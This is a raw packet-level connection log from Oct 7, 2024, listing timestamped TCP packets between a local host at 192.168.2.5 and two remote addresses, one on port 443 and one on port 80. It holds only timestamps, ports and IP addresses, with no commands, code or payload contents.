Oct 7, 2024 03:15:43.135459900 CEST	49858	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:43.135469913 CEST	443	49858	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:43.160415888 CEST	443	49855	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:43.160509109 CEST	443	49855	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:43.160643101 CEST	49855	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:43.161032915 CEST	49855	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:43.161047935 CEST	443	49855	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:43.161056995 CEST	49855	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:43.161062002 CEST	443	49855	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:43.161537886 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.161576033 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.161611080 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.161657095 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.161695004 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.161709070 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.161772013 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.161825895 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.161828995 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.161878109 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.161879063 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.161912918 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.161933899 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.161947966 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.161966085 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.161982059 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.161999941 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.162030935 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.162033081 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.162074089 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.162084103 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.162125111 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.162126064 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.162175894 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.162178040 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.162208080 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.162230015 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.162252903 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.162259102 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.162309885 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.162312984 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.162362099 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.162370920 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.162415028 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.162431002 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.162462950 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.162462950 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.162514925 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.162516117 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.162571907 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.162579060 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.162622929 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.162626982 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.162671089 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.162673950 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.162707090 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.162727118 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.162739992 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.162758112 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.162790060 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.162791967 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.162826061 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.162844896 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.162872076 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.162875891 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.162909031 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.162926912 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.162957907 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.162960052 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.163009882 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.163011074 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.163044930 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.163063049 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.163094044 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.163095951 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.163147926 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.163147926 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.163187027 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.163199902 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.163222075 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.163239002 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.163255930 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.163274050 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.163290024 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.163306952 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.163324118 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.163341999 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.163374901 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.163376093 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.163420916 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.163446903 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.163480043 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.163499117 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.163531065 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.163531065 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.163568974 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.163583994 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.163602114 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.163620949 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.163652897 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.163657904 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.163702965 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.163717031 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.163736105 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.163749933 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.163784981 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.163790941 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.163824081 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.163840055 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.163875103 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.163877964 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.163912058 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.163929939 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.163944960 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.163960934 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.163978100 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.163995981 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.164028883 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.164030075 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.164062977 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.164079905 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.164093971 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.164113045 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.164127111 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.164143085 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.164160967 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.164180994 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.164196014 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.164212942 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.164230108 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.164262056 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.164283991 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.164295912 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.164330006 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.164330959 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.164362907 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.164367914 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.164393902 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.164396048 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.164417028 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.164429903 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.164453983 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.164469957 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.164503098 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.164524078 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.164535999 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.164561033 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.164568901 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.164602995 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.164606094 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.164630890 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.164634943 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.164653063 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.164668083 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.164684057 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.164700985 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.164717913 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.164735079 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.164747000 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.164767981 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.164788961 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.164802074 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.164817095 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.164834976 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.164851904 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.164869070 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.164885998 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.164901972 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.164917946 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.164936066 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.164952040 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.164973021 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.164987087 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.165008068 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.165025949 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.165041924 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.165059090 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.165077925 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.165095091 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.165111065 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.165127993 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.165144920 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.165160894 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.165178061 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.165211916 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.165220022 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.165245056 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.165245056 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.165268898 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.165277004 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.165306091 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.165311098 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.165328979 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.165344954 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.165378094 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.165394068 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.165411949 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.165430069 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.165445089 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.165468931 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.165478945 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.165494919 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.165512085 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.165529966 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.165545940 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.165563107 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.165580988 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.165596962 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.165616035 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.165633917 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.165647984 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.165667057 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.165683031 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.165699959 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.165716887 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.165733099 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.165750027 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.165770054 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.165782928 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.165816069 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.165817022 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.165828943 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.165849924 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.165863037 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.165884972 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.165899992 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.165919065 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.165935993 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.165951967 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.165968895 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.165986061 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.166004896 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.166022062 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.166038036 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.166054964 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.166069984 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.166105032 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.166109085 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.166158915 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.167567015 CEST	49859	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:43.167597055 CEST	443	49859	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:43.168243885 CEST	49859	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:43.168450117 CEST	49859	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:43.168462038 CEST	443	49859	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:43.215117931 CEST	443	49856	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:43.215311050 CEST	443	49856	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:43.215507030 CEST	49856	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:43.215547085 CEST	49856	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:43.215564013 CEST	443	49856	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:43.215578079 CEST	49856	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:43.215584993 CEST	443	49856	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:43.219221115 CEST	49860	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:43.219245911 CEST	443	49860	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:43.219326973 CEST	49860	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:43.219508886 CEST	49860	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:43.219520092 CEST	443	49860	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:43.252901077 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.252923012 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.252952099 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.252968073 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.252993107 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.253012896 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.253017902 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.253036022 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.253063917 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.253081083 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.253082991 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.253098011 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.253112078 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.253125906 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.253137112 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.253142118 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.253169060 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.253173113 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.253185034 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.253212929 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.253223896 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.253231049 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.253240108 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.253267050 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.253272057 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.253288031 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.253312111 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.253314018 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.253345966 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.253350973 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.253376961 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.253380060 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.253403902 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.253406048 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.253418922 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.253426075 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.253434896 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.253456116 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.253464937 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.253479004 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.253483057 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.253500938 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.253511906 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.253529072 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.253545046 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.253546953 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.253566980 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.253573895 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.253581047 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.253587008 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.253587961 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.253593922 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.253621101 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.253637075 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.253655910 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.253671885 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.253671885 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.253701925 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.253710985 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.253729105 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.253734112 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.253746033 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.253761053 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.253770113 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.253786087 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.253801107 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.253810883 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.253817081 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.253832102 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.253833055 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.253849983 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.253875971 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.253892899 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.253899097 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.253906012 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.253918886 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.253927946 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.253936052 CEST	80	49782	95.164.90.97	192.168.2.5
